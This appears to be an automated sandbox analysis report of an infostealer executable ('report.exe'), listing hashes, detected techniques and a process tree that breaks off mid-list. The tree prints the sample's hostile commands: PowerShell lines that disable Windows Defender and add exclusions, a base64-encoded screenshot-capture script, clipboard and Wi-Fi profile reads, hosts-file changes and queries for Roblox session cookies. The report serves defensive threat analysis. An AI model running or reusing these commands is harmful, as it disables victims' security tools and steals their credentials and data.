Analysis

  • max time kernel
    67s
  • max time network
    71s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-12-2024 00:32

General

  • Target

    report.exe

  • Size

    16.5MB

  • MD5

    0348ea94a168413a893e608d75612afd

  • SHA1

    dce50e3c0eb33c43a668212e2684294ac1097ef8

  • SHA256

    0ac72c96a93a7847318681d72a9ecc40c420c58cefef2e18d307d1c233a8ab3c

  • SHA512

    22e370a17b6bc7e39bfbab474e0e8805bb416c637e123f2c4f1858028c6226e0ac14a905243851685ea079f5e438cd5ca104c884aa457eee4a4ad8f4c845aa10

  • SSDEEP

    393216:vVVE3cSGzhFYP3CudbnJPzErcfAIH2gYBgDWJTnz6:vjE3+z697PQrcfwBB+Wl6

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\report.exe
    "C:\Users\Admin\AppData\Local\Temp\report.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Users\Admin\AppData\Local\Temp\report.exe
      "C:\Users\Admin\AppData\Local\Temp\report.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\report.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\report.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2164
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetWindowsHookEx
            PID:4816
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1664
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4668
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:4324
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4408
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:1248
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2160
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3076
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\report.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:1584
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\report.exe"
              4⤵
              • Views/modifies file attributes
              PID:4272
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2212
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4476
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2076
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1324
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
              PID:100
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2780
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:4504
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:4776
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:2264
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2216
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:2896
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:4908
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3576
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2148
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:1124
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:3704
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:2072
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:3296
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:3536
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:2016
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:2844
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3268
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4hbs3fd\d4hbs3fd.cmdline"
                                    5⤵
                                      PID:412
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB67F.tmp" "c:\Users\Admin\AppData\Local\Temp\d4hbs3fd\CSC723D241051204416A8B1A0F7298F253.TMP"
                                        6⤵
                                          PID:1756
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:1148
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:3664
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:2592
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1308
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:4584
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:1248
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:4032
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:4312
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3716
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:3960
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:3292
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:384
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:4980
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:5056
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:2632
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:2312
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:4780
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:4468
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4868
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:2260
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
